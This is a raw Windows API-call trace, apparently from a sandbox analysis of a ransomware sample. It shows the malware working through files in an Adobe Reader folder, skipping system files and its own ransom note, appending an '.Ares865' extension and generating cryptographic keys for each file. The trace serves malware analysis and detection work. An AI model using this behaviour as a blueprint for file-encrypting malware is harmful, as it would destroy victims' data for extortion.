lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0154.217] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d67db00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x81ed8ae0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9d67db00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4288, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IrakHau.htm", cAlternateFileName="")) returned 1 [0154.217] lstrcmpiW (lpString1="IrakHau.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0154.217] lstrcmpiW (lpString1="IrakHau.htm", lpString2="aoldtz.exe") returned 1 [0154.217] lstrcmpiW (lpString1="IrakHau.htm", lpString2=".") returned 1 [0154.217] lstrcmpiW (lpString1="IrakHau.htm", lpString2="..") returned 1 [0154.217] lstrcmpiW (lpString1="IrakHau.htm", lpString2="windows") returned -1 [0154.217] lstrcmpiW (lpString1="IrakHau.htm", lpString2="bootmgr") returned 1 [0154.217] lstrcmpiW (lpString1="IrakHau.htm", lpString2="temp") returned -1 [0154.217] lstrcmpiW (lpString1="IrakHau.htm", lpString2="pagefile.sys") returned -1 [0154.217] lstrcmpiW (lpString1="IrakHau.htm", lpString2="boot") returned 1 [0154.217] lstrcmpiW (lpString1="IrakHau.htm", lpString2="ids.txt") returned 1 [0154.217] lstrcmpiW (lpString1="IrakHau.htm", lpString2="ntuser.dat") returned -1 [0154.217] lstrcmpiW (lpString1="IrakHau.htm", lpString2="perflogs") returned -1 [0154.217] lstrcmpiW (lpString1="IrakHau.htm", lpString2="MSBuild") returned -1 [0154.217] lstrlenW (lpString="IrakHau.htm") returned 11 [0154.217] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Esl") returned 44 [0154.217] lstrcpyW (in: lpString1=0x2cce452, lpString2="IrakHau.htm" | out: lpString1="IrakHau.htm") returned="IrakHau.htm" [0154.217] lstrlenW (lpString="IrakHau.htm") returned 11 [0154.217] lstrlenW (lpString="Ares865") returned 7 [0154.217] lstrcmpiW (lpString1="Hau.htm", lpString2="Ares865") returned 1 [0154.217] lstrlenW (lpString=".dll") returned 4 [0154.217] lstrcmpiW (lpString1="IrakHau.htm", lpString2=".dll") returned 1 [0154.217] lstrlenW (lpString=".lnk") returned 4 [0154.217] lstrcmpiW (lpString1="IrakHau.htm", lpString2=".lnk") returned 1 [0154.217] lstrlenW (lpString=".ini") returned 4 [0154.217] lstrcmpiW (lpString1="IrakHau.htm", lpString2=".ini") returned 1 [0154.217] lstrlenW (lpString=".sys") returned 4 [0154.217] lstrcmpiW (lpString1="IrakHau.htm", lpString2=".sys") returned 1 [0154.217] lstrlenW (lpString="IrakHau.htm") returned 11 [0154.218] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm.Ares865") returned 60 [0154.218] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\irakhau.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\irakhau.htm.ares865"), dwFlags=0x1) returned 1 [0154.220] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\irakhau.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.220] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17032) returned 1 [0154.220] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.220] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.220] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.220] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.221] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.221] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.221] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4590, lpName=0x0) returned 0x170 [0154.222] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4590) returned 0x190000 [0154.224] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.224] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.224] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.224] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.225] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0154.225] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0154.225] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0154.225] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0154.225] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0154.225] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0154.225] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0154.225] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0154.225] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0154.225] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0154.225] CloseHandle (hObject=0x170) returned 1 [0154.225] CloseHandle (hObject=0x118) returned 1 [0154.225] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0154.225] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0154.225] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0154.226] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7feb61e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x423b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Leame.htm", cAlternateFileName="")) returned 1 [0154.226] lstrcmpiW (lpString1="Leame.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0154.226] lstrcmpiW (lpString1="Leame.htm", lpString2="aoldtz.exe") returned 1 [0154.226] lstrcmpiW (lpString1="Leame.htm", lpString2=".") returned 1 [0154.226] lstrcmpiW (lpString1="Leame.htm", lpString2="..") returned 1 [0154.226] lstrcmpiW (lpString1="Leame.htm", lpString2="windows") returned -1 [0154.226] lstrcmpiW (lpString1="Leame.htm", lpString2="bootmgr") returned 1 [0154.226] lstrcmpiW (lpString1="Leame.htm", lpString2="temp") returned -1 [0154.226] lstrcmpiW (lpString1="Leame.htm", lpString2="pagefile.sys") returned -1 [0154.226] lstrcmpiW (lpString1="Leame.htm", lpString2="boot") returned 1 [0154.226] lstrcmpiW (lpString1="Leame.htm", lpString2="ids.txt") returned 1 [0154.226] lstrcmpiW (lpString1="Leame.htm", lpString2="ntuser.dat") returned -1 [0154.226] lstrcmpiW (lpString1="Leame.htm", lpString2="perflogs") returned -1 [0154.226] lstrcmpiW (lpString1="Leame.htm", lpString2="MSBuild") returned -1 [0154.226] lstrlenW (lpString="Leame.htm") returned 9 [0154.226] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\IrakHau.htm") returned 52 [0154.226] lstrcpyW (in: lpString1=0x2cce452, lpString2="Leame.htm" | out: lpString1="Leame.htm") returned="Leame.htm" [0154.226] lstrlenW (lpString="Leame.htm") returned 9 [0154.226] lstrlenW (lpString="Ares865") returned 7 [0154.226] lstrcmpiW (lpString1="ame.htm", lpString2="Ares865") returned -1 [0154.226] lstrlenW (lpString=".dll") returned 4 [0154.226] lstrcmpiW (lpString1="Leame.htm", lpString2=".dll") returned 1 [0154.226] lstrlenW (lpString=".lnk") returned 4 [0154.226] lstrcmpiW (lpString1="Leame.htm", lpString2=".lnk") returned 1 [0154.226] lstrlenW (lpString=".ini") returned 4 [0154.226] lstrcmpiW (lpString1="Leame.htm", lpString2=".ini") returned 1 [0154.226] lstrlenW (lpString=".sys") returned 4 [0154.226] lstrcmpiW (lpString1="Leame.htm", lpString2=".sys") returned 1 [0154.226] lstrlenW (lpString="Leame.htm") returned 9 [0154.227] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm.Ares865") returned 58 [0154.227] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leame.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leame.htm.ares865"), dwFlags=0x1) returned 1 [0154.229] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leame.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.230] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16955) returned 1 [0154.230] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.230] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.230] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.230] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.231] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.231] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.231] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4540, lpName=0x0) returned 0x170 [0154.232] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4540) returned 0x190000 [0154.234] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.234] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.234] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.235] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.235] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0154.235] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0154.235] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0154.235] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0154.235] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0154.235] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0154.235] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0154.235] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0154.235] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0154.235] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0154.235] CloseHandle (hObject=0x170) returned 1 [0154.235] CloseHandle (hObject=0x118) returned 1 [0154.235] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0154.235] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0154.236] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0154.236] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x41e3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LeesMij.htm", cAlternateFileName="")) returned 1 [0154.236] lstrcmpiW (lpString1="LeesMij.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0154.236] lstrcmpiW (lpString1="LeesMij.htm", lpString2="aoldtz.exe") returned 1 [0154.236] lstrcmpiW (lpString1="LeesMij.htm", lpString2=".") returned 1 [0154.236] lstrcmpiW (lpString1="LeesMij.htm", lpString2="..") returned 1 [0154.236] lstrcmpiW (lpString1="LeesMij.htm", lpString2="windows") returned -1 [0154.236] lstrcmpiW (lpString1="LeesMij.htm", lpString2="bootmgr") returned 1 [0154.236] lstrcmpiW (lpString1="LeesMij.htm", lpString2="temp") returned -1 [0154.236] lstrcmpiW (lpString1="LeesMij.htm", lpString2="pagefile.sys") returned -1 [0154.236] lstrcmpiW (lpString1="LeesMij.htm", lpString2="boot") returned 1 [0154.236] lstrcmpiW (lpString1="LeesMij.htm", lpString2="ids.txt") returned 1 [0154.236] lstrcmpiW (lpString1="LeesMij.htm", lpString2="ntuser.dat") returned -1 [0154.236] lstrcmpiW (lpString1="LeesMij.htm", lpString2="perflogs") returned -1 [0154.236] lstrcmpiW (lpString1="LeesMij.htm", lpString2="MSBuild") returned -1 [0154.236] lstrlenW (lpString="LeesMij.htm") returned 11 [0154.236] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leame.htm") returned 50 [0154.236] lstrcpyW (in: lpString1=0x2cce452, lpString2="LeesMij.htm" | out: lpString1="LeesMij.htm") returned="LeesMij.htm" [0154.236] lstrlenW (lpString="LeesMij.htm") returned 11 [0154.236] lstrlenW (lpString="Ares865") returned 7 [0154.236] lstrcmpiW (lpString1="Mij.htm", lpString2="Ares865") returned 1 [0154.236] lstrlenW (lpString=".dll") returned 4 [0154.236] lstrcmpiW (lpString1="LeesMij.htm", lpString2=".dll") returned 1 [0154.236] lstrlenW (lpString=".lnk") returned 4 [0154.236] lstrcmpiW (lpString1="LeesMij.htm", lpString2=".lnk") returned 1 [0154.236] lstrlenW (lpString=".ini") returned 4 [0154.236] lstrcmpiW (lpString1="LeesMij.htm", lpString2=".ini") returned 1 [0154.236] lstrlenW (lpString=".sys") returned 4 [0154.237] lstrcmpiW (lpString1="LeesMij.htm", lpString2=".sys") returned 1 [0154.237] lstrlenW (lpString="LeesMij.htm") returned 11 [0154.237] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm.Ares865") returned 60 [0154.237] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leesmij.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leesmij.htm.ares865"), dwFlags=0x1) returned 1 [0154.240] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leesmij.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.240] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16867) returned 1 [0154.240] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.240] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.240] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.240] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.241] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.241] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.241] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x44f0, lpName=0x0) returned 0x170 [0154.243] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x44f0) returned 0x190000 [0154.244] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.245] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.245] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.245] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.245] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0154.245] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0154.245] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0154.245] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0154.245] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0154.245] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0154.246] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0154.246] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0154.246] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0154.246] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0154.246] CloseHandle (hObject=0x170) returned 1 [0154.246] CloseHandle (hObject=0x118) returned 1 [0154.246] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0154.246] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0154.246] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0154.246] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9640cd00, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7fe90080, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x9640cd00, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x4289, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Leggimi.htm", cAlternateFileName="")) returned 1 [0154.246] lstrcmpiW (lpString1="Leggimi.htm", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0154.246] lstrcmpiW (lpString1="Leggimi.htm", lpString2="aoldtz.exe") returned 1 [0154.246] lstrcmpiW (lpString1="Leggimi.htm", lpString2=".") returned 1 [0154.246] lstrcmpiW (lpString1="Leggimi.htm", lpString2="..") returned 1 [0154.246] lstrcmpiW (lpString1="Leggimi.htm", lpString2="windows") returned -1 [0154.246] lstrcmpiW (lpString1="Leggimi.htm", lpString2="bootmgr") returned 1 [0154.246] lstrcmpiW (lpString1="Leggimi.htm", lpString2="temp") returned -1 [0154.246] lstrcmpiW (lpString1="Leggimi.htm", lpString2="pagefile.sys") returned -1 [0154.247] lstrcmpiW (lpString1="Leggimi.htm", lpString2="boot") returned 1 [0154.247] lstrcmpiW (lpString1="Leggimi.htm", lpString2="ids.txt") returned 1 [0154.247] lstrcmpiW (lpString1="Leggimi.htm", lpString2="ntuser.dat") returned -1 [0154.247] lstrcmpiW (lpString1="Leggimi.htm", lpString2="perflogs") returned -1 [0154.247] lstrcmpiW (lpString1="Leggimi.htm", lpString2="MSBuild") returned -1 [0154.247] lstrlenW (lpString="Leggimi.htm") returned 11 [0154.247] lstrlenW (lpString="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\LeesMij.htm") returned 52 [0154.247] lstrcpyW (in: lpString1=0x2cce452, lpString2="Leggimi.htm" | out: lpString1="Leggimi.htm") returned="Leggimi.htm" [0154.247] lstrlenW (lpString="Leggimi.htm") returned 11 [0154.247] lstrlenW (lpString="Ares865") returned 7 [0154.247] lstrcmpiW (lpString1="imi.htm", lpString2="Ares865") returned 1 [0154.247] lstrlenW (lpString=".dll") returned 4 [0154.247] lstrcmpiW (lpString1="Leggimi.htm", lpString2=".dll") returned 1 [0154.247] lstrlenW (lpString=".lnk") returned 4 [0154.247] lstrcmpiW (lpString1="Leggimi.htm", lpString2=".lnk") returned 1 [0154.247] lstrlenW (lpString=".ini") returned 4 [0154.247] lstrcmpiW (lpString1="Leggimi.htm", lpString2=".ini") returned 1 [0154.247] lstrlenW (lpString=".sys") returned 4 [0154.247] lstrcmpiW (lpString1="Leggimi.htm", lpString2=".sys") returned 1 [0154.247] lstrlenW (lpString="Leggimi.htm") returned 11 [0154.247] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm.Ares865") returned 60 [0154.248] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leggimi.htm"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leggimi.htm.ares865"), dwFlags=0x1) returned 1 [0154.249] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Leggimi.htm.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\leggimi.htm.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0154.249] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=17033) returned 1 [0154.250] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0154.250] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4710 [0154.250] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0154.250] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0154.251] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0154.251] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.251] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4590, lpName=0x0) returned 0x170 [0154.252] MapViewOfFile (hFileMappingObject=0x170, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4590) returned 0x190000 [0154.254] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0154.254] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0154.254] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0154.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2e4788 [0154.255] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4788 | out: hHeap=0x2b0000) returned 1 [0154.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x2dd710 [0154.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdda8 [0154.255] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dd710 | out: hHeap=0x2b0000) returned 1 [0154.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2cdec0 [0154.255] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0154.255] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdec0 | out: hHeap=0x2b0000) returned 1 [0154.255] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0154.255] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cdda8 | out: hHeap=0x2b0000) returned 1 [0154.255] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0154.255] CloseHandle (hObject=0x170) returned 1 [0154.255] CloseHandle (hObject=0x118) returned 1 [0154.255] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4710 | out: hHeap=0x2b0000) returned 1 [0154.255] HeapFree (in: 